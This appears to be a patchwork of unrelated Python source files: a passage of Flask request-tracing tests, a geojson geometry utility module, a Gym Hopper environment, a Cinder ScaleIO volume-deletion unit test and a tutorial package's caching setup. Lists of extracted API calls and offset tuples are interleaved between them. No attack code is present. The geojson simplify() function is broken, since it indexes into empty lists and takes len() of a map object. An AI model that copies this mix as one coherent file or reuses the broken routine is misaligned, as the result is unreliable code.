'tests.contrib.flask.test_request.fivehundred', 'flask.handle_user_exception', 'flask.handle_exception', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') self.assertEqual(req_span.resource, 'GET /500') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 1) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('http.method'), 'GET') self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/500') assert_span_http_status_code(req_span, 500) self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundred') self.assertEqual(req_span.get_tag('flask.url_rule'), '/500') # Dispatch span dispatch_span = spans[3] self.assertEqual(dispatch_span.service, 'flask') self.assertEqual(dispatch_span.name, 'flask.dispatch_request') self.assertEqual(dispatch_span.resource, 'flask.dispatch_request') self.assertEqual(dispatch_span.error, 1) self.assertTrue(dispatch_span.get_tag('error.msg').startswith('500 error')) self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(dispatch_span.get_tag('error.type'), base_exception_name) # Handler span handler_span = spans[4] self.assertEqual(handler_span.service, 'flask') self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.fivehundred') self.assertEqual(handler_span.resource, '/500') self.assertEqual(handler_span.error, 1) self.assertTrue(handler_span.get_tag('error.msg').startswith('500 error')) self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(handler_span.get_tag('error.type'), base_exception_name) # User exception span user_ex_span = spans[5] self.assertEqual(user_ex_span.service, 'flask') self.assertEqual(user_ex_span.name, 'flask.handle_user_exception') self.assertEqual(user_ex_span.resource, 'flask.handle_user_exception') self.assertEqual(user_ex_span.error, 1) self.assertTrue(user_ex_span.get_tag('error.msg').startswith('500 error')) self.assertTrue(user_ex_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(user_ex_span.get_tag('error.type'), base_exception_name) def test_request_501(self): """ When making a request When the requested endpoint calls `abort(501)` We create the expected spans """ @self.app.route('/501') def fivehundredone(): abort(501) res = self.client.get('/501') self.assertEqual(res.status_code, 501) spans = self.get_spans() self.assertEqual(len(spans), 10) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'tests.contrib.flask.test_request.fivehundredone', 'flask.handle_user_exception', 'flask.handle_http_exception', 'flask.process_response', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') self.assertEqual(req_span.resource, 'GET /501') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 1) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('http.method'), 'GET') self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/501') assert_span_http_status_code(req_span, 501) self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundredone') self.assertEqual(req_span.get_tag('flask.url_rule'), '/501') # Dispatch span dispatch_span = spans[3] self.assertEqual(dispatch_span.service, 'flask') self.assertEqual(dispatch_span.name, 'flask.dispatch_request') self.assertEqual(dispatch_span.resource, 'flask.dispatch_request') self.assertEqual(dispatch_span.error, 1) self.assertTrue(dispatch_span.get_tag('error.msg').startswith('501 Not Implemented')) self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotImplemented') # Handler span handler_span = spans[4] self.assertEqual(handler_span.service, 'flask') self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.fivehundredone') self.assertEqual(handler_span.resource, '/501') self.assertEqual(handler_span.error, 1) self.assertTrue(handler_span.get_tag('error.msg').startswith('501 Not Implemented')) self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(handler_span.get_tag('error.type'), 'werkzeug.exceptions.NotImplemented') # User exception span user_ex_span = spans[5] self.assertEqual(user_ex_span.service, 'flask') self.assertEqual(user_ex_span.name, 'flask.handle_user_exception') self.assertEqual(user_ex_span.resource, 'flask.handle_user_exception') self.assertEqual(user_ex_span.error, 0) def test_request_error_handler(self): """ When making a request When the requested endpoint raises an exception We create the expected spans """ @self.app.errorhandler(500) def error_handler(e): return 'Whoops', 500 @self.app.route('/500') def fivehundred(): raise Exception('500 error') res = self.client.get('/500') self.assertEqual(res.status_code, 500) self.assertEqual(res.data, b'Whoops') spans = self.get_spans() if flask_version >= (0, 12, 0): self.assertEqual(len(spans), 11) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'tests.contrib.flask.test_request.fivehundred', 'flask.handle_user_exception', 'flask.handle_exception', 'tests.contrib.flask.test_request.error_handler', 'flask.process_response', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) else: self.assertEqual(len(spans), 10) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'tests.contrib.flask.test_request.fivehundred', 'flask.handle_user_exception', 'flask.handle_exception', 'tests.contrib.flask.test_request.error_handler', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') self.assertEqual(req_span.resource, 'GET /500') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 1) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('http.method'), 'GET') self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/500') assert_span_http_status_code(req_span, 500) self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundred') self.assertEqual(req_span.get_tag('flask.url_rule'), '/500') # Dispatch span dispatch_span = spans[3] self.assertEqual(dispatch_span.service, 'flask') self.assertEqual(dispatch_span.name, 'flask.dispatch_request') self.assertEqual(dispatch_span.resource, 'flask.dispatch_request') self.assertEqual(dispatch_span.error, 1) self.assertTrue(dispatch_span.get_tag('error.msg').startswith('500 error')) self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(dispatch_span.get_tag('error.type'), base_exception_name) # Handler span handler_span = spans[4] self.assertEqual(handler_span.service, 'flask') self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.fivehundred') self.assertEqual(handler_span.resource, '/500') self.assertEqual(handler_span.error, 1) self.assertTrue(handler_span.get_tag('error.msg').startswith('500 error')) self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(handler_span.get_tag('error.type'), base_exception_name) # User exception span user_ex_span = spans[5] self.assertEqual(user_ex_span.service, 'flask') self.assertEqual(user_ex_span.name, 'flask.handle_user_exception') self.assertEqual(user_ex_span.resource, 'flask.handle_user_exception') self.assertEqual(user_ex_span.error, 1) self.assertTrue(user_ex_span.get_tag('error.msg').startswith('500 error')) self.assertTrue(user_ex_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(user_ex_span.get_tag('error.type'), base_exception_name)
[ "flask.abort" ]
[((16267, 16277), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (16272, 16277), False, 'from flask import abort\n'), ((22922, 22932), 'flask.abort', 'abort', (['(501)'], {}), '(501)\n', (22927, 22932), False, 'from flask import abort\n')]
__doc__ = 'github: https://github.com/brandonxiang/geojson-python-utils' import math from coordTransform_utils import wgs84togcj02 from coordTransform_utils import gcj02tobd09 def linestrings_intersect(line1, line2): """ To valid whether linestrings from geojson are intersected with each other. reference: http://www.kevlindev.com/gui/math/intersection/Intersection.js Keyword arguments: line1 -- first line geojson object line2 -- second line geojson object if(line1 intersects with other) return intersect point array else empty array """ intersects = [] for i in range(0, len(line1['coordinates']) - 1): for j in range(0, len(line2['coordinates']) - 1): a1_x = line1['coordinates'][i][1] a1_y = line1['coordinates'][i][0] a2_x = line1['coordinates'][i + 1][1] a2_y = line1['coordinates'][i + 1][0] b1_x = line2['coordinates'][j][1] b1_y = line2['coordinates'][j][0] b2_x = line2['coordinates'][j + 1][1] b2_y = line2['coordinates'][j + 1][0] ua_t = (b2_x - b1_x) * (a1_y - b1_y) - \ (b2_y - b1_y) * (a1_x - b1_x) ub_t = (a2_x - a1_x) * (a1_y - b1_y) - \ (a2_y - a1_y) * (a1_x - b1_x) u_b = (b2_y - b1_y) * (a2_x - a1_x) - (b2_x - b1_x) * (a2_y - a1_y) if not u_b == 0: u_a = ua_t / u_b u_b = ub_t / u_b if 0 <= u_a and u_a <= 1 and 0 <= u_b and u_b <= 1: intersects.append({'type': 'Point', 'coordinates': [ a1_x + u_a * (a2_x - a1_x), a1_y + u_a * (a2_y - a1_y)]}) # if len(intersects) == 0: # intersects = False return intersects def _bbox_around_polycoords(coords): """ bounding box """ x_all = [] y_all = [] for first in coords[0]: x_all.append(first[1]) y_all.append(first[0]) return [min(x_all), min(y_all), max(x_all), max(y_all)] def _point_in_bbox(point, bounds): """ valid whether the point is inside the bounding box """ return not(point['coordinates'][1] < bounds[0] or point['coordinates'][1] > bounds[2] or point['coordinates'][0] < bounds[1] or point['coordinates'][0] > bounds[3]) def _pnpoly(x, y, coords): """ the algorithm to judge whether the point is located in polygon reference: https://www.ecse.rpi.edu/~wrf/Research/Short_Notes/pnpoly.html#Explanation """ vert = [[0, 0]] for coord in coords: for node in coord: vert.append(node) vert.append(coord[0]) vert.append([0, 0]) inside = False i = 0 j = len(vert) - 1 while i < len(vert): if ((vert[i][0] > y) != (vert[j][0] > y)) and (x < (vert[j][1] - vert[i][1]) * (y - vert[i][0]) / (vert[j][0] - vert[i][0]) + vert[i][1]): inside = not inside j = i i += 1 return inside def _point_in_polygon(point, coords): inside_box = False for coord in coords: if inside_box: break if _point_in_bbox(point, _bbox_around_polycoords(coord)): inside_box = True if not inside_box: return False inside_poly = False for coord in coords: if inside_poly: break if _pnpoly(point['coordinates'][1], point['coordinates'][0], coord): inside_poly = True return inside_poly def point_in_polygon(point, poly): """ valid whether the point is located in a polygon Keyword arguments: point -- point geojson object poly -- polygon geojson object if(point inside poly) return true else false """ coords = [poly['coordinates']] if poly[ 'type'] == 'Polygon' else poly['coordinates'] return _point_in_polygon(point, coords) def point_in_multipolygon(point, multipoly): """ valid whether the point is located in a mulitpolygon (donut polygon is not supported) Keyword arguments: point -- point geojson object multipoly -- multipolygon geojson object if(point inside multipoly) return true else false """ coords_array = [multipoly['coordinates']] if multipoly[ 'type'] == "MultiPolygon" else multipoly['coordinates'] for coords in coords_array: if _point_in_polygon(point, coords): return True return False def number2radius(number): """ convert degree into radius Keyword arguments: number -- degree return radius """ return number * math.pi / 180 def number2degree(number): """ convert radius into degree Keyword arguments: number -- radius return degree """ return number * 180 / math.pi def draw_circle(radius_in_meters, center_point, steps=15): """ get a circle shape polygon based on centerPoint and radius Keyword arguments: point1 -- point one geojson object point2 -- point two geojson object if(point inside multipoly) return true else false """ steps = steps if steps > 15 else 15 center = [center_point['coordinates'][1], center_point['coordinates'][0]] dist = (radius_in_meters / 1000) / 6371 # convert meters to radiant rad_center = [number2radius(center[0]), number2radius(center[1])] # 15 sided circle poly = [] for step in range(0, steps): brng = 2 * math.pi * step / steps lat = math.asin(math.sin(rad_center[0]) * math.cos(dist) + math.cos(rad_center[0]) * math.sin(dist) * math.cos(brng)) lng = rad_center[1] + math.atan2(math.sin(brng) * math.sin(dist) * math.cos(rad_center[0]), math.cos(dist) - math.sin(rad_center[0]) * math.sin(lat)) poly.append([number2degree(lng), number2degree(lat)]) return {"type": "Polygon", "coordinates": [poly]} def rectangle_centroid(rectangle): """ get the centroid of the rectangle Keyword arguments: rectangle -- polygon geojson object return centroid """ bbox = rectangle['coordinates'][0] xmin = bbox[0][0] ymin = bbox[0][1] xmax = bbox[2][0] ymax = bbox[2][1] xwidth = xmax - xmin ywidth = ymax - ymin return {'type': 'Point', 'coordinates': [xmin + xwidth / 2, ymin + ywidth / 2]} def point_distance(point1, point2): """ calculate the distance between two point on the sphere like google map reference http://www.movable-type.co.uk/scripts/latlong.html Keyword arguments: point1 -- point one geojson object point2 -- point two geojson object if(point inside multipoly) return true else false """ lon1 = point1['coordinates'][0] lat1 = point1['coordinates'][1] lon2 = point2['coordinates'][0] lat2 = point2['coordinates'][1] deg_lat = number2radius(lat2 - lat1) deg_lon = number2radius(lon2 - lon1) a = math.pow(math.sin(deg_lat / 2), 2) + math.cos(number2radius(lat1)) * \ math.cos(number2radius(lat2)) * math.pow(math.sin(deg_lon / 2), 2) c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a)) return (6371 * c) * 1000 def geometry_within_radius(geometry, center, radius): """ To valid whether point or linestring or polygon is inside a radius around a center Keyword arguments: geometry -- point/linstring/polygon geojson object center -- point geojson object radius -- radius if(geometry inside radius) return true else false """ if geometry['type'] == 'Point': return point_distance(geometry, center) <= radius elif geometry['type'] == 'LineString' or geometry['type'] == 'Polygon': point = {} # it's enough to check the exterior ring of the Polygon coordinates = geometry['coordinates'][0] if geometry['type'] == 'Polygon' else geometry['coordinates'] for coordinate in coordinates: point['coordinates'] = coordinate if point_distance(point, center) > radius: return False return True def area(poly): """ calculate the area of polygon Keyword arguments: poly -- polygon geojson object return polygon area """ poly_area = 0 # TODO: polygon holes at coordinates[1] points = poly['coordinates'][0] j = len(points) - 1 count = len(points) for i in range(0, count): p1_x = points[i][1] p1_y = points[i][0] p2_x = points[j][1] p2_y = points[j][0] poly_area += p1_x * p2_y poly_area -= p1_y * p2_x j = i poly_area /= 2 return poly_area def centroid(poly): """ get the centroid of polygon adapted from http://paulbourke.net/geometry/polyarea/javascript.txt Keyword arguments: poly -- polygon geojson object return polygon centroid """ f_total = 0 x_total = 0 y_total = 0 # TODO: polygon holes at coordinates[1] points = poly['coordinates'][0] j = len(points) - 1 count = len(points) for i in range(0, count): p1_x = points[i][1] p1_y = points[i][0] p2_x = points[j][1] p2_y = points[j][0] f_total = p1_x * p2_y - p2_x * p1_y x_total += (p1_x + p2_x) * f_total y_total += (p1_y + p2_y) * f_total j = i six_area = area(poly) * 6 return {'type': 'Point', 'coordinates': [y_total / six_area, x_total / six_area]} def destination_point(point, brng, dist): """ Calculate a destination Point base on a base point and a distance Keyword arguments: pt -- polygon geojson object brng -- an angle in degrees dist -- distance in Kilometer between destination and base point return destination point object """ dist = float(dist) / 6371 # convert dist to angular distance in radians brng = number2radius(brng) lon1 = number2radius(point['coordinates'][0]) lat1 = number2radius(point['coordinates'][1]) lat2 = math.asin(math.sin(lat1) * math.cos(dist) + math.cos(lat1) * math.sin(dist) * math.cos(brng)) lon2 = lon1 + math.atan2(math.sin(brng) * math.sin(dist) * math.cos(lat1), math.cos(dist) - math.sin(lat1) * math.sin(lat2)) lon2 = (lon2 + 3 * math.pi) % (2 * math.pi) - math.pi # normalise to -180 degree +180 degree return {'type': 'Point', 'coordinates': [number2degree(lon2), number2degree(lat2)]} def simplify(source, kink=20): """ source[] array of geojson points kink in metres, kinks above this depth kept kink depth is the height of the triangle abc where a-b and b-c are two consecutive line segments """ source_coord = map(lambda o: {"lng": o.coordinates[0], "lat": o.coordinates[1]}, source) # count, n_stack, n_dest, start, end, i, sig; # dev_sqr, max_dev_sqr, band_sqr; # x12, y12, d12, x13, y13, d13, x23, y23, d23; F = (math.pi / 180.0) * 0.5 index = [] # aray of indexes of source points to include in the reduced line sig_start = [] # indices of start & end of working section sig_end = [] # check for simple cases count = len(source_coord) if count < 3: return source_coord # one or two points # more complex case. initialize stack band_sqr = kink * 360.0 / (2.0 * math.pi * 6378137.0) # Now in degrees band_sqr *= band_sqr n_dest = 0 sig_start[0] = 0 sig_end[0] = count - 1 n_stack = 1 # while the stack is not empty while n_stack > 0: # ... pop the top-most entries off the stacks start = sig_start[n_stack - 1] end = sig_end[n_stack - 1] n_stack -= 1 if (end - start) > 1: #any intermediate points ? # ... yes, so find most deviant intermediate point to either side of line joining start & end points x12 = source[end]["lng"] - source[start]["lng"] y12 = source[end]["lat"] - source[start]["lat"] if math.fabs(x12) > 180.0: x12 = 360.0 - math.fabs(x12) x12 *= math.cos(F * (source[end]["lat"] + source[start]["lat"])) # use avg lat to reduce lng d12 = (x12 * x12) + (y12 * y12) i = start + 1 sig = start max_dev_sqr = -1.0 while i < end: x13 = source[i]["lng"] - source[start]["lng"] y13 = source[i]["lat"] - source[start]["lat"] if math.fabs(x13) > 180.0: x13 = 360.0 - math.fabs(x13) x13 *= math.cos(F * (source[i]["lat"] + source[start]["lat"])) d13 = (x13 * x13) + (y13 * y13) x23 = source[i]["lng"] - source[end]["lng"] y23 = source[i]["lat"] - source[end]["lat"] if math.fabs(x23) > 180.0: x23 = 360.0 - math.fabs(x23) x23 *= math.cos(F * (source[i]["lat"] + source[end]["lat"])) d23 = (x23 * x23) + (y23 * y23) if d13 >= (d12 + d23): dev_sqr = d23 elif d23 >= (d12 + d13): dev_sqr = d13 else: dev_sqr = (x13 * y12 - y13 * x12) * (x13 * y12 - y13 * x12) / d12 # solve triangle if dev_sqr > max_dev_sqr: sig = i max_dev_sqr = dev_sqr i += 1 if max_dev_sqr < band_sqr: # is there a sig. intermediate point ? #... no, so transfer current start point index[n_dest] = start n_dest += 1 else: # ... yes, so push two sub-sections on stack for further processing n_stack += 1 sig_start[n_stack - 1] = sig sig_end[n_stack - 1] = end n_stack += 1 sig_start[n_stack - 1] = start sig_end[n_stack - 1] = sig else: # ... no intermediate points, so transfer current start point index[n_dest] = start n_dest += 1 # transfer last point index[n_dest] = count - 1 n_dest += 1 # make return array r = [] for i in range(0, n_dest): r.append(source_coord[index[i]]) return map(lambda o: {"type": "Point","coordinates": [o.lng, o.lat]}, r) def wgs2gcj(geometry): """ convert wgs84 to gcj referencing by https://github.com/wandergis/coordTransform_py """ # TODO: point linestring point if geometry['type'] == 'MultiLineString': coordinates = geometry['coordinates'] for lines in coordinates: for line in lines: line[0], line[1] = wgs84togcj02(line[0], line[1]) return geometry def gcj2bd(geometry): """ convert gcj to bd referencing by https://github.com/wandergis/coordTransform_py """ # TODO: point linestring point if geometry['type'] == 'MultiLineString': coordinates = geometry['coordinates'] for lines in coordinates: for line in lines: line[0], line[1] = gcj02tobd09(line[0], line[1]) return geometry
[ "coordTransform_utils.gcj02tobd09", "math.sqrt", "coordTransform_utils.wgs84togcj02", "math.cos", "math.fabs", "math.sin" ]
[((7021, 7042), 'math.sin', 'math.sin', (['(deg_lat / 2)'], {}), '(deg_lat / 2)\n', (7029, 7042), False, 'import math\n'), ((7181, 7193), 'math.sqrt', 'math.sqrt', (['a'], {}), '(a)\n', (7190, 7193), False, 'import math\n'), ((7195, 7211), 'math.sqrt', 'math.sqrt', (['(1 - a)'], {}), '(1 - a)\n', (7204, 7211), False, 'import math\n'), ((12146, 12203), 'math.cos', 'math.cos', (["(F * (source[end]['lat'] + source[start]['lat']))"], {}), "(F * (source[end]['lat'] + source[start]['lat']))\n", (12154, 12203), False, 'import math\n'), ((7132, 7153), 'math.sin', 'math.sin', (['(deg_lon / 2)'], {}), '(deg_lon / 2)\n', (7140, 7153), False, 'import math\n'), ((10081, 10095), 'math.sin', 'math.sin', (['lat1'], {}), '(lat1)\n', (10089, 10095), False, 'import math\n'), ((10098, 10112), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (10106, 10112), False, 'import math\n'), ((10170, 10184), 'math.cos', 'math.cos', (['brng'], {}), '(brng)\n', (10178, 10184), False, 'import math\n'), ((10278, 10292), 'math.cos', 'math.cos', (['lat1'], {}), '(lat1)\n', (10286, 10292), False, 'import math\n'), ((10294, 10308), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (10302, 10308), False, 'import math\n'), ((12058, 12072), 'math.fabs', 'math.fabs', (['x12'], {}), '(x12)\n', (12067, 12072), False, 'import math\n'), ((12624, 12679), 'math.cos', 'math.cos', (["(F * (source[i]['lat'] + source[start]['lat']))"], {}), "(F * (source[i]['lat'] + source[start]['lat']))\n", (12632, 12679), False, 'import math\n'), ((12963, 13016), 'math.cos', 'math.cos', (["(F * (source[i]['lat'] + source[end]['lat']))"], {}), "(F * (source[i]['lat'] + source[end]['lat']))\n", (12971, 13016), False, 'import math\n'), ((14749, 14779), 'coordTransform_utils.wgs84togcj02', 'wgs84togcj02', (['line[0]', 'line[1]'], {}), '(line[0], line[1])\n', (14761, 14779), False, 'from coordTransform_utils import wgs84togcj02\n'), ((15155, 15184), 'coordTransform_utils.gcj02tobd09', 'gcj02tobd09', (['line[0]', 'line[1]'], {}), '(line[0], line[1])\n', (15166, 15184), False, 'from coordTransform_utils import gcj02tobd09\n'), ((5546, 5569), 'math.sin', 'math.sin', (['rad_center[0]'], {}), '(rad_center[0])\n', (5554, 5569), False, 'import math\n'), ((5572, 5586), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (5580, 5586), False, 'import math\n'), ((5656, 5670), 'math.cos', 'math.cos', (['brng'], {}), '(brng)\n', (5664, 5670), False, 'import math\n'), ((5788, 5811), 'math.cos', 'math.cos', (['rad_center[0]'], {}), '(rad_center[0])\n', (5796, 5811), False, 'import math\n'), ((5813, 5827), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (5821, 5827), False, 'import math\n'), ((10136, 10150), 'math.cos', 'math.cos', (['lat1'], {}), '(lat1)\n', (10144, 10150), False, 'import math\n'), ((10153, 10167), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (10161, 10167), False, 'import math\n'), ((10215, 10229), 'math.sin', 'math.sin', (['brng'], {}), '(brng)\n', (10223, 10229), False, 'import math\n'), ((10232, 10246), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (10240, 10246), False, 'import math\n'), ((10311, 10325), 'math.sin', 'math.sin', (['lat1'], {}), '(lat1)\n', (10319, 10325), False, 'import math\n'), ((10328, 10342), 'math.sin', 'math.sin', (['lat2'], {}), '(lat2)\n', (10336, 10342), False, 'import math\n'), ((12112, 12126), 'math.fabs', 'math.fabs', (['x12'], {}), '(x12)\n', (12121, 12126), False, 'import math\n'), ((12528, 12542), 'math.fabs', 'math.fabs', (['x13'], {}), '(x13)\n', (12537, 12542), False, 'import math\n'), ((12867, 12881), 'math.fabs', 'math.fabs', (['x23'], {}), '(x23)\n', (12876, 12881), False, 'import math\n'), ((5613, 5636), 'math.cos', 'math.cos', (['rad_center[0]'], {}), '(rad_center[0])\n', (5621, 5636), False, 'import math\n'), ((5639, 5653), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (5647, 5653), False, 'import math\n'), ((5713, 5727), 'math.sin', 'math.sin', (['brng'], {}), '(brng)\n', (5721, 5727), False, 'import math\n'), ((5730, 5744), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (5738, 5744), False, 'import math\n'), ((5830, 5853), 'math.sin', 'math.sin', (['rad_center[0]'], {}), '(rad_center[0])\n', (5838, 5853), False, 'import math\n'), ((5856, 5869), 'math.sin', 'math.sin', (['lat'], {}), '(lat)\n', (5864, 5869), False, 'import math\n'), ((12586, 12600), 'math.fabs', 'math.fabs', (['x13'], {}), '(x13)\n', (12595, 12600), False, 'import math\n'), ((12925, 12939), 'math.fabs', 'math.fabs', (['x23'], {}), '(x23)\n', (12934, 12939), False, 'import math\n')]
import gym.envs.mujoco.hopper as hopper import numpy as np class HopperEnv(hopper.HopperEnv): def _get_obs(self): return np.concatenate([ self.sim.data.qpos.flat[1:], self.sim.data.qvel.flat, ]) def reset_obs(self, obs): state = np.insert(obs, 0, 0.) qpos = state[:self.model.nq] qvel = state[self.model.nq:] self.set_state(qpos, qvel) return self._get_obs()
[ "numpy.insert", "numpy.concatenate" ]
[((135, 205), 'numpy.concatenate', 'np.concatenate', (['[self.sim.data.qpos.flat[1:], self.sim.data.qvel.flat]'], {}), '([self.sim.data.qpos.flat[1:], self.sim.data.qvel.flat])\n', (149, 205), True, 'import numpy as np\n'), ((288, 310), 'numpy.insert', 'np.insert', (['obs', '(0)', '(0.0)'], {}), '(obs, 0, 0.0)\n', (297, 310), True, 'import numpy as np\n')]
# Copyright (c) 2013 - 2015 EMC Corporation. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from six.moves import urllib from cinder import context from cinder import exception from cinder.tests.unit import fake_constants as fake from cinder.tests.unit import fake_volume from cinder.tests.unit.volume.drivers.emc import scaleio from cinder.tests.unit.volume.drivers.emc.scaleio import mocks class TestDeleteVolume(scaleio.TestScaleIODriver): """Test cases for ``ScaleIODriver.delete_volume()``""" def setUp(self): """Setup a test case environment. Creates a fake volume object and sets up the required API responses. """ super(TestDeleteVolume, self).setUp() ctx = context.RequestContext('fake', 'fake', auth_token=True) self.volume = fake_volume.fake_volume_obj( ctx, **{'provider_id': fake.PROVIDER_ID}) self.volume_name_2x_enc = urllib.parse.quote( urllib.parse.quote(self.driver._id_to_base64(self.volume.id)) ) self.HTTPS_MOCK_RESPONSES = { self.RESPONSE_MODE.Valid: { 'types/Volume/instances/getByName::' + self.volume_name_2x_enc: self.volume.id, 'instances/Volume::{}/action/removeMappedSdc'.format( self.volume.provider_id): self.volume.provider_id, 'instances/Volume::{}/action/removeVolume'.format( self.volume.provider_id ): self.volume.provider_id, }, self.RESPONSE_MODE.BadStatus: { 'types/Volume/instances/getByName::' + self.volume_name_2x_enc: mocks.MockHTTPSResponse( { 'errorCode': 401, 'message': 'BadStatus Volume Test', }, 401 ), 'instances/Volume::{}/action/removeVolume'.format( self.volume.provider_id ): mocks.MockHTTPSResponse( { 'errorCode': 401, 'message': 'BadStatus Volume Test', }, 401 ), }, } def test_bad_login_and_volume(self): self.set_https_response_mode(self.RESPONSE_MODE.BadStatus) self.assertRaises(exception.VolumeBackendAPIException, self.driver.delete_volume, self.volume) def test_delete_volume(self): """Setting the unmap volume before delete flag for tests """ self.driver.configuration.set_override( 'sio_unmap_volume_before_deletion', override=True) self.driver.delete_volume(self.volume)
[ "cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse", "cinder.tests.unit.fake_volume.fake_volume_obj", "cinder.context.RequestContext" ]
[((1268, 1323), 'cinder.context.RequestContext', 'context.RequestContext', (['"""fake"""', '"""fake"""'], {'auth_token': '(True)'}), "('fake', 'fake', auth_token=True)\n", (1290, 1323), False, 'from cinder import context\n'), ((1347, 1416), 'cinder.tests.unit.fake_volume.fake_volume_obj', 'fake_volume.fake_volume_obj', (['ctx'], {}), "(ctx, **{'provider_id': fake.PROVIDER_ID})\n", (1374, 1416), False, 'from cinder.tests.unit import fake_volume\n'), ((2211, 2299), 'cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse', 'mocks.MockHTTPSResponse', (["{'errorCode': 401, 'message': 'BadStatus Volume Test'}", '(401)'], {}), "({'errorCode': 401, 'message':\n 'BadStatus Volume Test'}, 401)\n", (2234, 2299), False, 'from cinder.tests.unit.volume.drivers.emc.scaleio import mocks\n'), ((2536, 2624), 'cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse', 'mocks.MockHTTPSResponse', (["{'errorCode': 401, 'message': 'BadStatus Volume Test'}", '(401)'], {}), "({'errorCode': 401, 'message':\n 'BadStatus Volume Test'}, 401)\n", (2559, 2624), False, 'from cinder.tests.unit.volume.drivers.emc.scaleio import mocks\n')]
# -*- coding: utf-8 -*- __version__ = '1.0.2' import os import appdirs import osmnx as ox import joblib import requests from .files import load_vars, save_vars, cached, inflate_tar, download_zipfile from .data import data, list_data, problematic from .tools.view_code import show_file from . import mapping cache_dir = None memory = None def set_cache_dir(location=None, compress=True, verbose=0, **kwargs): """ Set up a cache directory for use with the tutorials. Parameter --------- cache_dir : Path-like or False, optional A path for the cache files. Set to False to disable caching. """ global memory, cache_dir if location is None: location = appdirs.user_cache_dir('transportation_tutorials') if location is False: location = None memory = joblib.Memory(location, compress=compress, verbose=verbose, **kwargs) make_cache = ( (ox, 'gdf_from_place'), (ox, 'graph_from_bbox'), (requests, 'get'), (requests, 'post'), ) for module, func_name in make_cache: try: func = getattr(module, f"_{func_name}_orig") except AttributeError: func = getattr(module, func_name) setattr(module, f"_{func_name}_orig", func) setattr(module, func_name, memory.cache(func)) set_cache_dir()
[ "joblib.Memory", "appdirs.user_cache_dir" ]
[((772, 841), 'joblib.Memory', 'joblib.Memory', (['location'], {'compress': 'compress', 'verbose': 'verbose'}), '(location, compress=compress, verbose=verbose, **kwargs)\n', (785, 841), False, 'import joblib\n'), ((668, 718), 'appdirs.user_cache_dir', 'appdirs.user_cache_dir', (['"""transportation_tutorials"""'], {}), "('transportation_tutorials')\n", (690, 718), False, 'import appdirs\n')]
